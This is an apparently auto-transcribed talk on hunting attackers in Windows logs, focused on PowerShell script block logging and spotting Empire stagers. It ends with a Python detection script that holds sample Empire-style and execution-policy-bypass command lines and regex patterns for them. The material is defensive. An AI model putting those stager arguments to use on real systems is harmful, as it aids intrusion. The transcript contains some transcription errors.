backwards but you can see when services are actually created within a Windows environment you're gonna have this information you're gonna have the account name that created it and you can take a look at it a lot of times I'm not gonna lie these are gonna blend in so well that you're really gonna have to pay attention like just a letter off something of that nature sometimes though you will see just basic garbage across there and you know that that's probably gonna be a malicious process that's running within your environment all right I hate talking about this everyone has done this before but it just pains me so much one customer in the past year and a

half has PowerShell logging enabled this is a massive tool like for the blue team for your offensive team for everybody within the environment so real quickly how many people actually have this enabled and know that it's enabled in their environment okay yeah this is something you just have to do it look at all of the tooling that's out there look at all the presentations that you see it like DEFCON everywhere how are you guys catching this activity if you're not logging PowerShell you're not catching it so it's getting through your environment this is the simplest logging solution that you can put into play and get wins immediately from so there is volume issues with this as well this can

be super noisy so if you have to pick pick script block logging this is the log that you want you do not want to go with module logging if volume is an issue so script block logging freaking awesome the best log that windows has come up with in the past couple years would be my opinion it captures pretty much the full command and the contents of the script it can do a little bit of deification it might not necessarily make the code readable to you but enough where you can do something with it and know that something is occurring on so pretty much it shows who executed the script when it was run regardless of how

PowerShell was executed it ends up here set up same kind of deal that's where it is in group policy this is where you configure it and then examples empire stager I mean everyone knows what Empire is it's used by so many people so many red team's adversaries actors whatever it's there if you're not logging this you are not catching this you're not gonna see this occur so it's based on like a listener stager and an agent the key giveaway here for Empire it's the - sta which means PowerShell is pretty much in single threaded mode I still have no freaking idea why they do that if anyone knows come find me after and tell me because PowerShell is

multi-threaded so I don't know why they would do this but you're gonna see like the no op for no profile with the sta and then the W one that's a dead giveaway for Empire in your environment other interesting behavior that you can do with this just start looking at off you station nothing like I said before should be obvious gated in your environment unless like you've got like a rogue coder going on or something occurring that's very weird some of the arguments you can look at there's a excellent talk by Daniel Bohannon kind of goes into this he did invoke obfuscation and a few other tools as well there's so many variants to this but you can just start with the basics a

lot of people won't put the effort into like completely off you skate this or make it ridiculous where you can't read it you can just look for no profile or no op just see what occurs within there and then set execution policy this is not this is not a security control in any freaking way all you have to do is type dash bypass and you're through this no matter what occurs so many companies are like oh we'll just put that on and we're good to go no do script signing do something else this will not work and it's a hell of a good way to search like you can just start typing - bypass look in your for

104 logs if that comes up I've seen it before in companies where the admins utilize it because they don't really they didn't configure it appropriately but generally in most environments when you pull that up and that occurs it's something bad it's it's not gonna be anything good um and then the other thing with this - is you can also if you have four six eight eight involved like the process creation and you're starting to look at like the command lines like one of the awesome things you can start to do with that is you can break those command lines down maybe just throw them out into an Excel and look at the file names that are being executed like it

may not be you know just a basic powershell it might not be like bob's powershell at ps1 like you're gonna see blobs like this because they auto generate them it's not gonna be something named normally so that might be another really good giveaway right there alright module logging so this is the one if you have volume issues do not enable this it's not as robust as script block logging in my opinion it's useful but it's not as useful if you have the all you do both you can do that so it's pretty much pipeline execution details get a little bit of the variable initial initialization the problem with this one is though you will not always get the

full script so you're gonna get pieces of the script and you're not gonna really understand kind of probably everything that's occurring that's why I always say go with script block logging it just works much much better that way all right set up group policy configuration so this is one of the use cases where I do utilize it for PowerShell remoting so you've like NR PS session you can utilize invoke WMI and you have invoke command so when PowerShell is pretty much using remoting you have to utilize win RM for this which if any system administrator in your environment is using PowerShell when RM is enabled already so you're gonna see probably some of these commands they may be just an

administrator doing his job or it may be you know something malicious but well you can see at the top is I think it's like the very top you see like enter PS session so sometimes what I'll do with this is just if I find like an interesting command lit or argument that's run I'll search this first and see if there's any hits and then I'll go into a script LOC logging 4104 and pull down the actual information that I'm interested in um so here's another example this is still the same Empire stager this is kind of what you're gonna see it's not as robust you're gonna get partially I think most of the blob on

this one you'll get but not everything in there ok so those are all of the windows logs that most people do not have enabled that's the stuff that you need to enable in your environment I'm telling you right now like it could save a lot of money from a very expensive EDR solution if you're a smaller a midsize company turn those on first you can find persistence that way you can find a lot of bad that way before you move up so basic thread hunting strategies with this stuff once you have it I view a mix of like statistical analysis and then data analysis so what I look like the biggest things is everyone's like oh

you've got a baseline your entire environment well that's a lot of work most people don't do that so you can sort a lot of this stuff if you look at like all the command lines that are being run in your environment or all the scheduled tasks the highest numbered ones those are going to be allowed that's probably gonna be on every system in your environment which is why it has the highest count all the way down to you know maybe like halfway in that list that's probably your baseline for the most part in your environment then you have your outliers at the bottom that are like one offs two offs those are the ones you start looking at immediately

that's the stuff where it's like that probably shouldn't be here it might be interesting but that's where you're gonna go with it so there's a lot you can do this you know visualization as well like if you have like a tableau license or something you can throw all of these weird logs into that and visualize the data if that works for you instead of staring it Splunk looking at a white list the whole day you can look at blobs that are color-coded and very interesting I've pulled information out of this especially with a sock where you have a very large enterprise sock that's may be spread across in a couple of different countries and say you take a

look at like IP scanning like socks always like I had nothing got through closed it if you take all of the IP scanning for a month from all of those sock analysts and you put it into a visualization you might start to bubble up and say like hey this IP range is hitting that country this country this country at certain times and dates but you're not gonna see that when every single person's closing stuff and they're not really communicating as to what they're closing like your very basic alerts can turn into very powerful information and then Osen Greg you mentioned this before you can still do this kind of stuff read affect report AT&T cybersecurity

which bought alienvault otx is still free I hope for a lot longer but we'll see virustotal you can go to intelligence and get tons of information out of that research lab like your home your office whatever you guys like play around with runn tools capture these logs start trying to check that stuff at work and then Twitter you can get a ton of information from that so this is just super quick this is Apache Zeppelin so it's open source this is kind of one of the ways that we hunt with all of our data we throw it into here put this on top you can do sequel sparks equal Python etc whatever language you like

this is a super basic sequel query and I was just doing what I told you guys I was counting all of the command lines in a month actually no I was doing one day because of the data size it's just looking so I went immediately to the bottom to the one offs and I'm just scrolling up looking at those and seeing there's anything interesting and you immediately have the powershell with like window style hidden etc etc and you know that's not gonna be good but this is one way that you can do it and you can do this with so much data it doesn't have to be you know command lines you can do it with logging account creation

etc you do it with a lot of stuff so here's another one this one is pretty much service named doing the same thing looking at services that are common within the systems in your environment and if you do this this is a really good way as well to baseline the services that are acceptable within your company and then you're gonna start to see at the bottom when you start going towards those outliers those anomalies that are down there you're gonna start seeing weird names so you can see like the SVC host assist doesn't really match the other ones are numbered as well I'm not sure why but it stands out it's somebody to look into you can dig into that if

you have the logging um here's another one as well so this one is just what I told you guys just start basic you don't have to go immediately and write this crazy freaking reg X it's gonna match everything in the world just start with bypass look at that like is anyone running that in your environment okay I gotta go talk to Bob because he's running bypassed every time he does like a GPO push or something like that you're still gonna find bad stuff you're still probably gonna find stuff that's occurring within your environment that's expected but this could also be a talking point to be like hey we need to do a little bit more security around

PowerShell if people are running this um and then the last one this is like the funniest thing because you would never expect this to actually occur in an environment but it does sometimes people are super freaking lazy and they won't rename any cats this happens like I will go into an environment that's brand-new and still run this every time because you never know like you can really just pull one out and be like oh that was awesome but a little work in next time but yeah it's the same kind of principle start very basic like even if you feel like uncomfortable like this should probably never happen you never know like you can get a win

out of the most basic search terms in here one of the things that we wanted to get to that we never ended up being I'll put together for this presentation is a little demonstration and some open source tool information so as a poor substitute we just threw this slide in when it comes to Windows systems OS query win log beat and system on in addition to you know just native Windows OS logging those are some good tools that you might want to go out and take a look at and then we've got tools that also support the analysis the data so we talked a lot about like you know how you go about hunting what you can find and

all these windows logs that Brian went through and we just kind of waved our hand and basically said yeah you've got access to all these logs and you've got some platform where you can query these logs and do you know the Apaches up one kind of analytics and things like that but there is some work that goes into setting up those environments so you know open source help hunter those are some great platforms to go off and take a look at and will give you an environment sort of an complete all-in-one package and some really great work that those guys have done in the community and around the open-source threat hunting world so just some things

to take a look at so just wrapping things up you know hopefully you got something out of this presentation when it comes to getting started with threat hunting if you're not doing it already Windows logs are a great place to start obviously you've got to have you know when you comes to building a program people process technology alright so it comes with the you know look at the people you gotta have analysts that actually know how to do this analysts that can dedicate time to it it's not something that you can just take you know thirty minutes a day and try and accomplish in any sort of effective manner so wrap some analysts around it spend some time on it you'll

you really see a return there make sure you follow the process grab some data start with Windows logs easy place and and leverage some sort of platform starting maybe with open source just to get your hands dirty and with that thank you very much for attending appreciate

if you guys have any questions we'll be sticking around you know you can ask us now we got a couple minutes or just catch us afterwards
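The 4688 hunting steps described in the talk (stacking command lines so the one-offs surface, flagging core Windows binaries launched from outside System32, and searching PowerShell arguments for the Empire -NoP/-sta/-W 1 combination and the basic "bypass" term), as an added Python example that is not part of the talk or the speakers' tooling. The events are constructed samples, the field names are assumptions standing in for whatever your log platform exposes, and it goes one step beyond the talk by also flagging a long base64 blob after -Enc/-EncodedCommand.

```python
import re
from collections import Counter

# Constructed sample 4688 events (command-line field enabled), not real telemetry:
# three normal svchost launches, one svchost.exe from a user's Temp folder, one
# Empire-style PowerShell stager and one -ExecutionPolicy Bypass run by an admin.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"host": "WS01", "user": "alice", "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs"},
    {"host": "WS02", "user": "bob", "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs"},
    {"host": "WS03", "user": "carol", "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs"},
    {"host": "WS02", "user": "bob", "image": r"C:\Users\bob\AppData\Local\Temp\svchost.exe",
     "cmdline": r"C:\Users\bob\AppData\Local\Temp\svchost.exe"},
    # the -Enc blob is a placeholder (base64 of repeated "A"), not a real payload
    {"host": "WS01", "user": "alice", "image": PS,
     "cmdline": "powershell -NoP -sta -NonI -W 1 -Enc " + "QQBB" * 12},
    {"host": "WS03", "user": "carol", "image": PS,
     "cmdline": r"powershell -ExecutionPolicy Bypass -File \\fs01\scripts\gpo-push.ps1"},
]

# Core Windows binaries that should only launch from System32 / SysWOW64.
SYSTEM_BINARIES = {"csrss.exe", "svchost.exe", "lsass.exe", "wininit.exe",
                   "services.exe", "smss.exe"}
STANDARD_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# PowerShell argument patterns from the talk: the Empire -NoP/-sta/-W 1 combo,
# the basic "bypass" search, and a long base64 blob after -Enc/-EncodedCommand.
PS_INDICATORS = {
    "empire_style_args": re.compile(
        r"(?=.*-nop\b)(?=.*-sta\b)(?=.*-w(indowstyle)?\s*(1|hidden)\b)", re.I),
    "bypass": re.compile(r"\bbypass\b", re.I),
    "encoded_command": re.compile(
        r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
}


def launch_path_alert(image):
    """True when a core Windows binary name runs from outside System32/SysWOW64."""
    path = image.lower()
    name = path.rsplit("\\", 1)[-1]
    return name in SYSTEM_BINARIES and not path.startswith(STANDARD_DIRS)


def powershell_indicators(cmdline):
    """Names of the PowerShell argument patterns present in a command line."""
    if "powershell" not in cmdline.lower():
        return []
    return [name for name, rx in PS_INDICATORS.items() if rx.search(cmdline)]


def stack(events, field="cmdline"):
    """Count a field across events; least common values (the one-offs) first."""
    counts = Counter(e[field] for e in events)
    return sorted(counts.items(), key=lambda kv: (kv[1], kv[0]))


def hunt(events):
    """Run the launch-path and PowerShell checks over every event."""
    alerts = []
    for e in events:
        reasons = []
        if launch_path_alert(e["image"]):
            reasons.append("system binary outside System32")
        reasons += powershell_indicators(e["cmdline"])
        if reasons:
            alerts.append({"host": e["host"], "user": e["user"],
                           "reasons": reasons, "cmdline": e["cmdline"]})
    return alerts


if __name__ == "__main__":
    for cmdline, n in stack(EVENTS):
        print(f"{n:4d}  {cmdline}")  # one-offs come first; the baseline sits at the bottom
    for a in hunt(EVENTS):
        print(a["host"], a["user"], a["reasons"])
```

The "bypass" pattern is deliberately as broad as the talk suggests, so expect it to also catch administrators' GPO push scripts; that is the conversation starter the speaker describes, not a false positive to tune away first.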